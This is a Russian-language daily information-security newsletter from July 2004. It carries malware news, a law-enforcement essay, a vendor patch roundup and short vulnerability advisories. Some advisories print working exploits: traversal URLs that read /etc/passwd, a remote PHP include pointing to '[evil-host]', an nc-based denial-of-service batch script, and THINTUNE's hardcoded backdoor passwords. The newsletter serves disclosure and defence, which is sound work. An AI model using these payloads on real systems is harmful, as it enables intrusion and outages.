Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

15 новостей по информационной безопасности каждый день


Информационный Канал Subscribe.Ru

Новости информационной безопасности Стратег.Ру
Ekey.ru Удостоверяющий Центр"

26.7.2004 - 26.7.2004

Содержание


Проблемные ситуации, информационная преступность, сетевые войны

Весть о самоубийстве Усамы бин Ладена разнесли хакеры

26 июля | SecurityLab.ru

Участники нескольких тысяч интернет-конференций одновременно получили электронные письма, сообщающие, что Усама бин Ладен покончил с собой. Всем желающим предлагают увидеть соответствующие фотоснимки.

В посланиях говорится, что "террорист номер один" якобы повесился, и его труп своими глазами видели журналисты CNN.

Текст содержит ссылку на веб-страницу, где якобы находятся сенсационные фотографии.

При попытке загрузить страницу в компьютер проникает вирус, который в принципе может дать злоумышленникам контроль над зараженной машиной.

Эксперты говорят, что данный вирус уже появлялся в Сети, но теперь злоумышленник создал для него более соблазнительную "упаковку".

"Хакеры и создатели вирусов идут на любые уловки, чтобы заставить людей открыть вредоносные приложения. В этот раз они решили сыграть на войне с террором", - говорит Грэм Клюли, старший консультант фирмы Sophos, занимающейся компьютерной безопасностью.

В прошлом, как известно, любопытных и легковерных пользователей ловили, обещая показать снимки обнаженной Анны Курниковой.


Информационая безопасность бизнеса

Информационная разведка – перспективы и возможности

26 июля | www.crime-research.ru

Информационная разведка по своим параметрам и целям направлена на самостоятельное решение оперативно-служебных задач и задач информационной безопасности общества в целом.

Уникальные стратегические возможности разведывательно-поисковых мероприятий в криминогенной информационной среде, позволяющие вскрывать наиболее доходные замаскированные промыслы организованной преступности, предопределяют необходимость разработки: системы "встречного поиска" - совмещения разведывательной информации, полученной от виртуальной информационной среды, СМИ с конкретными объектами криминальной инфраструктуры, попадающими в сферу поиска в результате агентурных мероприятий, и наоборот; методик ведения разведывательно-упредительной работы в совокупности криминогенных информационных сред с использованием тактики оперативного структурирования территории в интересах конкретных оперативных разработок и реализации обогащенной оперативной информации непроцессуальным порядком; использования ранее не применявшихся оперативных информационных накопителей (новых по задачам и структуре и самим материальным носителям дел оперативного учета).

Так, состояние и динамика развития компьютерных технологий и сети Интернет как принципиально нового и постоянно расширяющегося объекта оперативного поиска (учета) выделяют из структуры информационной разведки ее отдельную разновидность - телекоммуникационную разведку, позволяющую определить физическое место нахождения криминальной компьютерной информации.

При решении задач специфической организации оперативно-розыскной деятельности, отражающей организационную суть информационной разведки, необходимо учитывать, что на организацию ведения оперативной деятельности в криминогенной информационной среде (провайдерские компании, частные узлы мобильной, телефонной и спутниковой связи, производители и дистрибьюторы средств вычислительной техники, контролирующие государственные органы, осуществляющие лицензионно-контрольные функции в сфере телекоммуникаций и связанные с ними лица) оказывают влияние следующие факторы: указанные объекты ранее в директивных документах МВД не относились к местам концентрации преступного элемента и, соответственно, оперативные подходы отсутствовали; специфичность подходов к "хакерской" среде (изолированность, корпоративность, особенности поведенческой психологии, использование в общении своеобразного "арго" и пр.); не устанавливается их связь с организованными преступными сообществами, формирующими "пакет заказов" в криминальной информационной среде, причастность фигурантов к общеуголовным преступлениям.

Появление информационной разведки кардинальным образом повлияло на расширение возможностей в предупреждении преступлений (постоянного контроля, поиска, преграждения перевода средств за рубеж, выдаче лицензий на предпринимательскую деятельность); позволяет кардинально расширить возможности отождествления преступников за счет расширения специализированного (собственно информационного) перечня признаков - позволяющих накапливать информацию и проводить криминалистическую идентификацию.

Признаки в информационной среде основываются на результатах использования поисковых руководств, позволяющих устанавливать тождество разыскиваемых и проверяемых объектов, например, по ключевым словам-индикаторам, распечаткам, номерам аппаратуры в компьютерной, радио-, телефонной среде, "почерку" пользователей.

В дальнейшем, сосредоточиваясь на первичной поисковой работе по установлению следов деликтной окраски (полученной на первом этапе) в информационных средах и идентифицируя ее как противоправную, реальна ее переработка в следственно-судебную, закрепляемая, например, в ходе выемок "жестких" дисков, содержащих похищенную информацию, порнографические изделия, "пиратские" видеофильмы, диски и пр.


Информационные ресурсы

Обзор уведомлений дистрибьюторов операционных систем (с 19 по 25 июля 2004 года).

26 июля | SecurityLab.ru

SecurityLab.ru представляет еженедельный обзор уведомлений дистрибьюторов операционных систем. На этой неделе было опубликовано 16 уведомлений от 6 производителей Linux систем, 2 уведомления от Santa Cruz Operation, 2 уведомления от OpenPKG и 1 уведомление от Hewlett-Packard.

Red Hat опубликовал 4 уведомления, устраняющих уязвимости в mailman, в libxml2 в Red Hat Linux и 2 обновления: httpd (1 обновление) и httpd (2 обновление) в Fedora Core.

GENTOO LINUX опубликовал 5 уведомлений, устраняющих подмену URL в Opera , удаленное переполнение буфера в l2tpd , множественные уязвимости отказа в обслуживании и слабое разрешение в Linux ядре, уязвимость форматной строки в mod_ssl и выполнение произвольного кода в Unreal Games.

SuSE Linux опубликовал 1 уведомление, устраняющее переполнение буфера в SAMBA.

Debian опубликовал 4 уведомления, устраняющих несколько уязвимостей в PHP-Nuke, уязвимость в courier, уязвимость в mailreader и уязвимость форматной строки в mod_ssl.

Mandrake опубликовал 1 уведомление, устраняющее переполнение буфера в SAMBA.

Conectiva Linux опубликовал 1 уведомление, устраняющее переполнение буфера в SAMBA.

HEWLETT-PACKARD опубликовал 1 уведомление, устраняющее удаленный неавторизованный доступ в xfs и stmkfont в HP-UX.

OpenPKG опубликовал 2 уведомления, устраняющих переполнение буфера в SAMBA и несколько уязвимостей в PHP-Nuke.

Santa Cruz Operation опубликовал 2 уведомления, устраняющих различные переполнения буфера и другие проблемы безопасности в MMDF в ОpenServer 5.0.6 и OpenServer 5.0.7 и различные проблемы безопасности в Mozilla в OpenServer 5.0.7.


Дыры и патчи программ и операционных сред

Удаленный доступ к системе с привилегиями ‘bin’ группы в HP-UX

26 июля | SecurityLab.ru

Программа: HP-UX 11.0,11.11,11.22,11.33

Опасность: Высокая

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в HP-UX когда запущен xfs и stmkfont. Удаленный пользователь может получить доступ к системе.

Удаленный пользователь может получить привилегии ‘bin’ группы. Дополнительные подробности не раскрываются.

URL производителя:

Решение:Для устранения уязвимости, установите соответствующее обновление:

http://itrc.hp.com

PHSS_31181 - B.11.23
PHSS_31180 - B.11.22
PHSS_31179 - B.11.11
PHSS_31178 - B.11.00

Уязвимость обхода каталога в EasyWeb FileManager for PostNuke

26 июля | SecurityLab.ru

Программа: EasyWeb FileManager 1.0 RC-1

Опасность:

Наличие эксплоита: Да

Описание: Уязвимость обхода каталога в EasyWeb FileManager for PostNuke позволяет удаленному пользователю просматривать произвольные каталоги на целевой системе.

Пример/Эксплоит:

/index.php?module=ew_filemanager&type=admin&func=manager&pathext=./././etc

/index.php?module=ew_filemanager&type=admin&func=manager&pa thext=./././etc/&view=passwd

URL производителя:http://home.postnuke.ru/index.php?module=subjects&func=listcat&catid=2

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Удаленное выполнение произвольного PHP кода в EasyIns Stadtportal

26 июля | SecurityLab.ru

Программа: EasyIns Stadtportal 4 и более ранние версии

Опасность: D

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в EasyIns Stadtportal. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целевой системе.

Пример/Эксплоит:

http://[target]/stadtportal-path/index.php?site=http://[evil-host]

URL производителя: http://www.easyins.de/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Удаленный отказ в обслуживании в Xitami web server

26 июля | SecurityLab.ru

Программа: Xitami Web Server 2.5c1

Опасность: Средняя

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в Xitami web server в обработке HTTP заголовков. Удаленный пользователь может вызвать условия отказа в обслуживании.

Удаленный пользователь может представить HTTP get запрос с некорректным заголовком (типа ‘DOS’), чтобы вызвать условия отказа в обслуживании на целевой системе.

Пример/Эксплоит:

if '%1'=='' echo Usage:%0 target [port]&&goto :eof
set PORT=80
if not '%2'=='' set PORT=%2
for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe echo Need nc.exe&&goto :eo
f
echo GET / HTTP/1.0>http.tmp
echo HOST: %1>>http.tmp
echo DOS>>http.tmp
echo.>>http.tmp
nc -w 10 %1 %PORT% < http.tmp
del http.tmp

URL производителя:http://www.xitami.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Несколько уязвимостей в THINTUNE

26 июля | SecurityLab.ru

Программа: THINTUNE 2.4.38 и более ранние версии; Проверено на THINTUNE M, firmware version 2.4.38-32-D, software version JSTREAM II 2.4.38

Опасность: Высокая

Наличие эксплоита: Да

Описание: Несколько уязвимостей обнаружено в THINTUNE. Удаленный пользователь может получить root доступ на целевую систему. Локальный пользователь может получить root доступ, просматривать произвольные файлы на целевой системе и просматривать пароли в открытом виде.

Программа включает незадокументированный, доступный из сети процесс, который слушает на 25072 TCP порту. Удаленный пользователь может подключиться к этому процессу, используя пароль ('jstwo') и получить root доступ к целевой системе.

Также сообщается, что локальный пользователь может получить конфигурационные настройки, включая записанные имена пользователей и пароли для RDP и ICA подключений и пароли для локального VNC сервера, JStream управляющего центра и хранителя экрана. Настройки конфигурации JStream хранятся в '/root/.keeper/' каталоге и подкаталогах в открытом виде.

Также сообщается, что локальный пользователь может нажать некоторые клавиши (CTRL SHIFT ALT DEL) и ввести специальный пароль ('maertsJ') чтобы получить root shell. Пароль жестко прописан в '/usr/bin/lshell' и не может быть изменен.

Также сообщается, что локальный пользователь может использовать 'file://' протокол в Web браузере, чтобы просматривать произвольные файлы на системе с root привилегиями.

Наконец сообщается, что когда проверяется пароли для управляющего центра и для lshell, система принимает корректный пароль пока он набирается. Пользователю не требуется нажать клавишу ввода. В результате это упрощает выполнение нападения подбора паролей.

URL производителя:http://www.thintune.com/

Решение:Установите обновленную версию программы - 2.4.39.

Удаленный отказ в обслуживании в VPOP3 почтовом сервере

26 июля | SecurityLab.ru

Программа: VPOP3 2.0.0k

Опасность: Средняя

Наличие эксплоита: Да

Описание: Отказ в обслуживании обнаружен в VPOP3 почтовом сервере. Удаленный пользователь может аварийно завершить работу программы.

Web mail интерфейс содержит уязвимость в проверке правильности данных в "Message List" в 'msglistlen' параметре. Удаленный пользователь может представить чрезмерно длинное значение для 'msglistlen', чтобы аварийно завершить работу почтового сервера.

URL производителя:http://www.pscs.co.uk/products/vpop3/index.php

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.

Переполнение буфера в SAMBA

26 июля | SecurityLab.ru

Программа: Samba до версии 2.2.10 и 3.0.0 - 3.0.4

Опасность: Критическая

Наличие эксплоита: Да

Описание: Два переполнения буфера обнаружено в SAMBA в Samba Web Administration Tool и в системах, использующих 'hash' метод. Удаленный пользователь может выполнить произвольный код на целевой системе.

Удаленный пользователь может представить специально обработанный HTTP Basic Authentication заголовок к Samba Web Administration Tool (SWAT) в SAMBA 3.0.2 - 3.0.4, содержащий некорректный Base64 символ, чтобы вызвать переполнение буфера и выполнить произвольный код на целевой системе.

Уязвимый код также используется для декодирования значения LDAP sambaMungedDial атрибутов на системах, которые используют ldapsam passdb. Однако производитель считает что этот пут не эксплуатируем.

Также сообщается о похожем переполнении буфера в коде, который обрабатывает 'mangling method = hash' параметр в 'smb.conf' файле. Значение по умолчанию 'mangling method = hash2' не уязвимо.

URL производителя:http://www.samba.org/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Уязвимость аутентификации в Cisco ONS

26 июля | SecurityLab.ru

Программа: Cisco ONS 15327, 15454, и 15454 SDH; до версии 4.6(2)

Опасность: Низкая

Наличие эксплоита: Нет

Описание: Уязвимость аутентификации в Cisco ONS позволяет удаленному пользователю получить доступ к учетной записи на системе.

Если учетная запись на системе имеет пустой пароль, то удаленный пользователь может войти на устройство с произвольным паролем, длиннее 10 символов. В процессе инсталляции CISCO15 userid имеет пустой пароль. Уязвимость воздействует только на TL1 интерфейс входа в систему.

URL производителя: http://www.cisco.com/warp/public/707/cisco-sa-20040721-ons.shtml

Решение:Установите обновленную версию (4.6(2) или более позднюю).




Инструменты управления содержанием Метод.ру
Дата создания документа: 19:19 26.07.04

http://subscribe.ru/
http://subscribe.ru/feedback/
Адрес подписки
Отписаться

В избранное